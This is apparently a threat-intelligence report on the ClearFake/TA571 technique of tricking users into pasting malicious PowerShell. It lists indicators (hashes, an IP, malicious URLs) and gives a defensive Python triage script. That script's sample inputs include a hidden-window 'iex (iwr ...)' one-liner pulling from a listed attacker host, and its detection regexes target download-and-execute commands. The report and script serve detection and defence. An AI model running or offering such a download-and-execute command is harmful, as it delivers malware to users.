From Clipboard to Compromise: A PowerShell Self-Pwn

June 17, 2024, 11:38 a.m.

Description

This intelligence report details a social engineering technique observed by Proofpoint researchers in which the victim does the work of infection: the user is persuaded to copy a malicious PowerShell script to the clipboard and paste and run it on their own machine. The threat actor TA571 and the ClearFake activity cluster both use this method to deliver DarkGate, Matanbuchus, NetSupport, and a range of information stealers. Although the chain requires significant user interaction, the lure presents an apparent problem and its solution at the same time (for instance, a fake error with a "fix" to paste), prompting users to act before they consider the risk.

Date

  • Created: June 17, 2024, 11:23 a.m.
  • Published: June 17, 2024, 11:23 a.m.
  • Modified: June 17, 2024, 11:38 a.m.

Indicators

  • 9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1
  • 11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f
  • 07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80
  • 91.222.173.113
  • https://rtattack.baqebei1.online/df/tt
  • https://oazevents.com/loader.html
  • https://lashakhazhalia86dancer.com/c.txt
  • https://kostumn1.ilabserver.com/1.zip
  • https://cdn3535.shop/1.zip
  • http://languangjob.com/pandstvx
  • https://jenniferwelsh.com/header.png
  • http://mylittlecabbage.net/xcdttafq
  • http://mylittlecabbage.net/qhsddxna
  • rechtsanwalt@ra-silberkuhl.com
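As an added example (not code from the report, and not a Proofpoint tool), the Python script below triages a captured command line, PowerShell script block, or file-hash record against the indicators listed above and adds a few generic heuristics for pasted PowerShell one-liners. The heuristic patterns (hidden window, encoded command, Invoke-Expression, web download, clipboard read) and the sample inputs are assumptions constructed for illustration; only the IOC values are taken from this page.

```python
import re
from urllib.parse import urlparse

# Indicators copied from the Indicators list of this report.
IOC_HASHES = {
    "9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1",
    "11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f",
    "07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80",
}
IOC_IPS = {"91.222.173.113"}
IOC_URLS = {
    "https://rtattack.baqebei1.online/df/tt",
    "https://oazevents.com/loader.html",
    "https://lashakhazhalia86dancer.com/c.txt",
    "https://kostumn1.ilabserver.com/1.zip",
    "https://cdn3535.shop/1.zip",
    "http://languangjob.com/pandstvx",
    "https://jenniferwelsh.com/header.png",
    "http://mylittlecabbage.net/xcdttafq",
    "http://mylittlecabbage.net/qhsddxna",
}
IOC_EMAILS = {"rechtsanwalt@ra-silberkuhl.com"}
# Match on hostnames so a different path on a listed host still fires.
IOC_HOSTS = {urlparse(u).hostname for u in IOC_URLS}

# Generic heuristics for pasted PowerShell one-liners. These are assumptions
# chosen for illustration, not patterns taken from this report.
HEURISTICS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I
    ),
    "clipboard_read": re.compile(r"get-clipboard", re.I),
}


def analyze(record: str) -> dict:
    """Return IOC and heuristic hits for one command line / script block / hash record."""
    lowered = record.lower()
    hits = {
        "hashes": sorted(h for h in IOC_HASHES if h in lowered),
        "ips": sorted(ip for ip in IOC_IPS if ip in record),
        "hosts": sorted(h for h in IOC_HOSTS if h in lowered),
        "emails": sorted(e for e in IOC_EMAILS if e in lowered),
        "heuristics": sorted(name for name, rx in HEURISTICS.items() if rx.search(record)),
    }
    ioc_count = sum(len(hits[k]) for k in ("hashes", "ips", "hosts", "emails"))
    # A single IOC match is a confirmed hit; heuristics alone only raise suspicion.
    hits["score"] = 10 * ioc_count + len(hits["heuristics"])
    if ioc_count:
        hits["verdict"] = "ioc_match"
    elif len(hits["heuristics"]) >= 2:
        hits["verdict"] = "suspicious"
    else:
        hits["verdict"] = "benign"
    return hits


def scan(records):
    """Triage a list of records; returns (record, verdict, score) tuples."""
    return [(r, analyze(r)["verdict"], analyze(r)["score"]) for r in records]


# Constructed sample inputs (not real telemetry). Sample 1 reaches a host from the
# report; sample 2 is a placeholder encoded command with no report IOC; sample 3 is
# ordinary administration; sample 4 is a hash record for a listed file.
SAMPLE_RECORDS = [
    'powershell -w hidden -c "iex (iwr https://lashakhazhalia86dancer.com/c.txt).Content"',
    "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB",
    "powershell Get-Service -Name Spooler",
    "FileCreate SHA256=9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1",
]

if __name__ == "__main__":
    for record, verdict, score in scan(SAMPLE_RECORDS):
        print(f"{verdict:10} score={score:<3} {record}")
```

Feed it the text of PowerShell script-block events, process command lines, or hash fields from your EDR export; anything returning `ioc_match` warrants a full host investigation, while `suspicious` results are a starting point for hunting pasted one-liners that do not yet have a known indicator.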

Attack Patterns

  • JaskaGO
  • Vidar Stealer
  • Amadey Loader
  • Matanbuchus
  • Lumma Stealer
  • DarkGate
  • XMRig
  • NetSupport
  • TA571
  • T1028
  • T1557.002
  • T1193
  • T1053.005
  • T1059.001
  • T1486
  • T1105
  • T1027
  • T1059